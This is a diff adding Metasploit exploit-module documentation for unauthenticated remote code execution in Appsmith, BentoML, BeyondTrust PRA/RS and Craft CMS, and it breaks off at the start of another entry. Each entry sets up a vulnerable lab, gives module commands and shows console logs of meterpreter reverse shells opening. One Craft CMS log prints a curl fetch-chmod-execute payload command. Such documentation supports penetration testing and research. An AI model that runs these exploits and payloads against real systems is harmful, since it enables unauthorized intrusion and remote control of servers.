+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/appsmith_rce_cve_2024_55964
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/appsmith_rce_cve_2024_55964) > options
+
+Module options (exploit/linux/http/appsmith_rce_cve_2024_55964):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      XIYHCHbc         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/appsmith_rce_cve_2024_55964) > run lhost=172.18.0.1 rhost=172.18.0.2 rport=80
+[*] Started reverse TCP handler on 172.18.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.50 detected.
+[*] Successfully signed up.
+[*] Successfully saved DB configuration.
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:56752) at 2025-04-05 14:41:08 +0900
+
+meterpreter > getuid
+Server username: postgres
+meterpreter > sysinfo
+Computer     : 172.18.0.2
+OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,131 @@
+## Vulnerable Application
+
+A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the v1.4.2 of BentoML.
+It allows any unauthenticated user to execute arbitrary code on the server.
+
+The vulnerability affects:
+
+    * 1.3.4 <= BentoML < 1.4.3
+
+This module was successfully tested on:
+
+    * BentoML 1.4.2 installed on Ubuntu 24.04
+
+
+### Installation
+
+1. `pip install -U bentoml==1.4.2`
+
+2. Define APIs in a service.py file:
+
+```python3
+import bentoml
+
+
+@bentoml.service(resources={"cpu": "2"})
+class Summarization:
+    @bentoml.api(batchable=True)
+    def summarize(self, texts):
+        return texts
+```
+
+3. `bentoml serve --host 0.0.0.0`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bentoml_rce_cve_2025_27520`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+###  ENDPOINT (optional)
+Endpoint to use.
+
+
+## Scenarios
+
+### Python payload
+```
+msf6 > use exploit/linux/http/bentoml_rce_cve_2025_27520
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > options
+
+Module options (exploit/linux/http/bentoml_rce_cve_2025_27520):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   ENDPOINT                   no        Endpoint to use
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     3000             yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Python payload
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Python\ payload
+target => Python payload
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
+[*] Use /summarize as api endpoint.
+[*] Sending stage (24772 bytes) to 192.168.56.16
+[*] Expected error occurred.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:34930) at 2025-04-16 21:44:13 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer        : vul
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### Linux command
+```
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Linux\ Command
+target => Linux Command
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
+[*] Use /summarize as api endpoint.
+[*] Expected error occurred.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:35272) at 2025-04-16 21:45:17 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.16
+OS           : Ubuntu 24.04 (Linux 6.8.0-56-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,165 @@
+## Vulnerable Application
+
+There was an insecure deserialization in BentoML's runner server.
+By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server,
+which will grant the attackers to have the initial access and information disclosure on the server.
+
+The vulnerability affects:
+
+    * 1.0.0a1 <= BentoML < 1.4.8
+
+This module was successfully tested on:
+
+    * BentoML 1.3.5 installed on Ubuntu 20.04
+
+
+### Installation
+
+1. `pip install -U bentoml==1.3.5`
+
+2. Create a file named model.py to create a simple model and save it:
+```python3
+import bentoml
+import numpy as np
+
+class mymodel:
+    def predict(self, info):
+        return np.abs(info)
+    def __call__(self, info):
+        return self.predict(info)
+
+model = mymodel()
+bentoml.picklable_model.save_model("mymodel", model)
+```
+
+3. Run the following command to save this model: `python3 model.py`
+
+4. Create bentofile.yaml to build this model:
+```yml
+service: "service.py"  
+description: "A model serving service with BentoML"  
+python:
+  packages:
+    - bentoml
+    - numpy
+models:
+  - tag: MyModel:latest  
+include:
+  - "*.py"
+```
+
+5. Create service.py to host this model:
+```python3
+import bentoml
+from bentoml.io import NumpyNdarray
+import numpy as np
+
+
+model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()
+
+svc = bentoml.Service("myservice", runners=[model_runner])
+
+async def predict(input_data: np.ndarray):
+
+    input_columns = np.split(input_data, input_data.shape[1], axis=1)
+    result_generator = model_runner.async_run(input_columns, is_stream=True)
+    async for result in result_generator:
+        yield result
+```
+
+6. Run the following commands to build and host this model:
+```bash
+bentoml build
+bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bentoml_runner_server_rce_cve_2025_32375`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+
+### Python payload
+```
+msf6 > use exploit/linux/http/bentoml_runner_server_rce_cve_2025_32375
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bentoml_runner_server_rce_cve_2025_32375) > options
+
+Module options (exploit/linux/http/bentoml_runner_server_rce_cve_2025_32375):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    3000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Python payload
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/bentoml_runner_server_rce_cve_2025_32375) > set target Python\ payload
+target => Python payload
+msf6 exploit(linux/http/bentoml_runner_server_rce_cve_2025_32375) > run lhost=192.168.56.1 rhost=192.168.56.15
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. BentoML's runner server detected.
+[*] Sending stage (24772 bytes) to 192.168.56.15
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.15:47712) at 2025-04-17 20:29:12 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer        : vul
+OS              : Linux 5.4.0-212-generic #232-Ubuntu SMP Sat Mar 15 15:34:35 UTC 2025
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### Linux command
+```
+msf6 exploit(linux/http/bentoml_runner_server_rce_cve_2025_32375) > set target Linux\ Command
+target => Linux Command
+msf6 exploit(linux/http/bentoml_runner_server_rce_cve_2025_32375) > run lhost=192.168.56.1 rhost=192.168.56.15
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. BentoML's runner server detected.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.15:43432) at 2025-04-17 20:29:48 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.15
+OS           : Ubuntu 20.04 (Linux 5.4.0-212-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
+Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
+product site. This exploit targets PRA and RS versions `24.3.1` and below.
+
+## Testing
+This exploit was tested against a vulnerable BeyondTrust Remote Support target running version `24.1.2`. To install
+a virtual appliance, follow [this documentation](https://docs.beyondtrust.com/rs/docs/va-install). You will first need
+to acquire the relevant software packages.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/beyondtrust_pra_rs_unauth_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Options
+
+### TargetCompanyName
+If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
+By default, this is auto discovered.
+
+### TargetServerFQDN
+If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
+By default, this is auto discovered.
+
+### LeverageCVE_2024_12356
+By default, this exploit does not leverage the argument injection vulnerability CVE-2024-12356, and instead exploits the
+SQLi vulnerability CVE-2025-1094 directly. Enabling this option will cause this exploit to leverage CVE-2024-12356 during
+the exploitation of the SQLi vulnerability CVE-2025-1094. In either case the SQLi vulnerability CVE-2025-1094 is leveraged
+to achieve RCE.
+
+## Scenarios
+
+### Default
+
+```
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > show options 
+
+Module options (exploit/linux/http/beyondtrust_pra_rs_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.105   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                       html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      usKuEPuSzgnx     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
+[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 24.1.2
+[*] Using company name: mytestcompany
+[*] Sending stage (3045380 bytes) to 192.168.86.105
+[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000
+
+meterpreter > getuid
+Server username: mytestcompany
+meterpreter > sysinfo
+Computer     : 192.168.86.105
+OS           : Gentoo 2.14 (Linux 6.1.76-bt)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,275 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in **Craft CMS**.
+
+The vulnerability lies in improper handling of Twig templates, which can be exploited
+to inject and execute arbitrary PHP code on the server via crafted HTTP requests.
+
+---
+
+### Affected Versions
+
+- **5.x Series**: `>= 5.0.0-RC1`, `< 5.5.2`
+- **4.x Series**: `>= 4.0.0-RC1`, `< 4.13.2`
+- **3.x Series**: `>= 3.0.0`, `< 3.9.14`
+
+---
+
+### Setting Up a Vulnerable Lab
+
+To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
+
+#### Docker Setup
+
+Install a specific vulnerable version of Craft CMS:
+
+```bash
+mkdir exploit-craft && \
+cd exploit-craft && \
+    # Configure DDEV (https://ddev.com/) project for Craft CMS \
+ddev config \
+  --project-type=craftcms \
+  --docroot=web \
+  --create-docroot \
+  --php-version="8.2" \
+  --database="mysql:8.0" \
+  --nodejs-version="20" && \
+    # Create the DDEV project
+ddev start -y && \
+    # Create Craft CMS with the specified version
+ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
+    # Install a vulnerable Craft CMS version
+ddev composer require "craftcms/cms:5.5.0" \
+  --no-scripts \
+  --no-interaction --with-all-dependencies && \
+    # Set the security key for Craft CMS
+ddev craft setup/security-key && \
+    # Install Craft CMS
+ddev craft install/craft \
+    --username=admin \
+    --password=password123 \
+    --email=admin@example.com \
+    --site-name=Testsite \
+    --language=en \
+    --site-url='$DDEV_PRIMARY_URL' && \
+    # Enable register_argc_argv for PHP
+mkdir -p .ddev/php/ && \
+echo "register_argc_argv = On" > .ddev/php/php.ini && \
+ddev restart && \
+    # Launch the project
+echo 'Setup complete. Launching the project.' && \
+ddev launch
+```
+
+---
+
+## Verification Steps
+
+1. Start the vulnerable Craft CMS instance using the steps above.
+2. Launch `msfconsole`.
+3. Use the module: `use exploit/linux/http/craftcms_ftp_template`.
+4. Set `RHOSTS` to the target Craft CMS instance.
+5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
+6. Execute the exploit with the `run` command.
+7. If successful, the module will execute the payload on the target.
+
+---
+
+## Options
+No option
+
+## Scenarios
+
+#### Successful Exploitation Against Craft CMS 5.5.0
+
+**Setup**:
+
+- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
+- Metasploit Framework.
+
+**Steps**:
+
+To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
+
+1. Start `msfconsole`:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/craftcms_ftp_template
+```
+
+3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
+```bash
+set RHOSTS exploit-craft.ddev.site
+```
+
+4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
+   - `RPORT` is set to `80`.
+   - `TARGETURI` is set to `/`.
+
+5. Set the payload for exploitation. For example:
+```bash
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+```
+
+6. Set the local listener address and port:
+```bash
+set LHOST 192.168.1.36
+set LPORT 4444
+```
+
+7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
+```bash
+set SRVPORT 9090
+set FETCH_SRVPORT 8081
+set FETCH_URIPATH /custom_payload_path
+```
+
+8. Run the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
+
+```bash
+msf6 exploit(linux/http/craftcms_ftp_template) > options
+
+Module options (exploit/linux/http/craftcms_ftp_template):
+
+   Name      Current Setting          Required  Description
+   ----      ---------------          --------  -----------
+   PASVPORT  0                        no        The local PASV data port to listen on (0 is random)
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    exploit-craft.ddev.site  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
+                                                oit.html
+   RPORT     80                       yes       The target port (TCP)
+   SRVHOST   192.168.1.36             yes       The local host or network interface to listen on. This must be an address on the local machine
+                                                 or 0.0.0.0 to listen on all addresses.
+   SRVPORT   9090                     yes       The local port to listen on.
+   SSL       false                    no        Negotiate SSL for incoming connections
+   SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      QnXFYebbb        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8081             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/craftcms_ftp_template) > exploit
+[*] Command to run on remote host: curl -so ./jlVAsfWu http://192.168.1.36:8081/LoPlnjEpeOexZNVppn6cAA;chmod +x ./jlVAsfWu;./jlVAsfWu&
+[*] Exploit running as background job 57.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/craftcms_ftp_template) >
+[*] Fetch handler listening on 192.168.1.36:8081
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Performing vulnerability check...
+[+] The target is vulnerable.
+[*] Starting FTP service...
+[*] Started service listener on 192.168.1.36:9090
+[*] FTP server started on 192.168.1.36:9090
+[*] Sending HTTP request to trigger the payload...
+[*] Triggering HTTP request...
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 250 "/default" is current directory.
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 550 /default is not retrievable.
+[*] on_client_command_mdtm
+[*] -> 550 /default is not retrievable.
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 550 Not a directory
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_mdtm
+[*] -> 213 20250110170738
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 550 Not a directory
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_mdtm
+[*] -> 213 20250110170738
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_epsv
+[*] -> 502 EPSV command not implemented.
+[*] on_client_command_retr
+[*] -> 150 Opening data connection for /default/index.twig
+[*] -> 226 Transfer complete.
+[*] on_client_command_quit
+[*] -> 221 Goodbye.
+[*] Client 172.26.0.2 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.26.0.2 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.26.0.2
+[*] Meterpreter session 14 opened (192.168.1.36:4444 -> 172.26.0.2:59546) at 2025-01-10 17:07:39 +0100
+
+msf6 exploit(linux/http/craftcms_ftp_template) > sessions 14
+[*] Starting interaction with 14...
+meterpreter > sysinfo
+Computer     : 172.26.0.2
+OS           : Debian 12.8 (Linux 5.15.0-130-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+[*] Waiting for FTP client connections...
+[*] Shutting down FTP service...
+[*] Server stopped.
+```
@@ -0,0 +1,215 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in Craft CMS.
+
+The vulnerability lies in improper handling of image transformations, which can be exploited to
+inject and execute arbitrary PHP code on the server via crafted HTTP requests.
+
+---
+
+### Affected Versions
+
+- **3.x series**: `>= 3.9.15`
+- **4.x series**: `>= 4.14.15`
+- **5.x series**: `>= 5.6.17`
+
+---
+
+### Setting Up a Vulnerable Lab
+
+To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
+
+#### Docker Setup
+
+Install a specific vulnerable version of Craft CMS:
+
+```bash
+mkdir exploit-craft && \
+cd exploit-craft && \
+    # Configure DDEV (https://ddev.com/) project for Craft CMS \
+ddev config \
+  --project-type=craftcms \
+  --docroot=web \
+  --create-docroot \
+  --php-version="8.2" \
+  --database="postgres:15" \
+  --nodejs-version="20" && \
+    # Create the DDEV project
+ddev start -y && \
+    # Create Craft CMS with the specified version
+ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
+    # Install a vulnerable Craft CMS version
+ddev composer require "craftcms/cms:5.5.0" \
+  --no-scripts \
+  --no-interaction --with-all-dependencies && \
+    # Set the security key for Craft CMS
+ddev craft setup/security-key && \
+    # Install Craft CMS
+ddev craft install/craft \
+    --username=admin \
+    --password=password123 \
+    --email=admin@example.com \
+    --site-name=Testsite \
+    --language=en \
+    --site-url='$DDEV_PRIMARY_URL' && \
+ddev restart && \
+    # Launch the project
+echo 'Setup complete. Launching the project.' && \
+ddev launch
+```
+
+---
+
+## Verification Steps
+
+1. Start the vulnerable Craft CMS instance using the steps above.
+2. Launch `msfconsole`.
+3. Use the module: `use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432`.
+4. Set `RHOSTS` to the target Craft CMS instance.
+5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
+6. Execute the exploit with the `run` command.
+7. If successful, the module will execute the payload on the target.
+
+
+## Options
+
+The module has the following option:
+
+- **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series.
+    It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.
+
+For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`.
+This is necessary for successful exploitation when dealing with these versions.
+
+Craft CMS uses the notion of an "Asset" to manage files and media such as images and documents; each asset has a unique ID.
+This module does not perform bruteforcing of asset IDs to avoid noisy and inefficient exploitation attempts.
+
+
+## Scenarios
+
+#### Successful Exploitation Against Craft CMS 5.5.0
+
+**Setup**:
+
+- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
+- Metasploit Framework.
+
+**Steps**:
+
+To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
+
+1. Start `msfconsole`:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
+```
+
+3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
+```bash
+set RHOSTS exploit-craft.ddev.site
+```
+
+4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
+   - `RPORT` is set to `80`.
+   - `TARGETURI` is set to `/`.
+
+5. Set the payload for exploitation. For example:
+```bash
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+```
+
+6. Set the local listener address and port:
+```bash
+set LHOST 192.168.1.36
+set LPORT 4444
+```
+
+7. Run the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
+
+##### For `ARCH_PHP`:
+
+```bash
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options
+
+Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   ASSET_ID  410              yes       Existing asset ID
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
+                                        etasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+```
+
+```bash
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Leaked session.save_path: /var/lib/php/sessions
+[+] The target is vulnerable. Session path leaked
+[*] Injecting stub & triggering payload...
+[*] Sending stage (40004 bytes) to 172.24.0.2
+[*] Meterpreter session 12 opened (192.168.1.36:4444 -> 172.24.0.2:35238) at 2025-04-29 21:52:44 +0200
+
+meterpreter > sysinfo
+Computer    : exploit-craft-web
+OS          : Linux exploit-craft-web 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+##### For `ARCH_CMD`:
+
+```bash
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set target 1
+target => 1
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Leaked session.save_path: /var/lib/php/sessions
+[+] The target is vulnerable. Session path leaked
+[*] Injecting stub & triggering payload...
+[*] Sending stage (3045380 bytes) to 172.24.0.2
+[*] Meterpreter session 13 opened (192.168.1.36:4444 -> 172.24.0.2:33436) at 2025-04-29 21:53:43 +0200
+
+meterpreter > sysinfo
+Computer     : 172.24.0.2
+OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+This exploit effectively serves as a bypass for CVE-2024-3408.
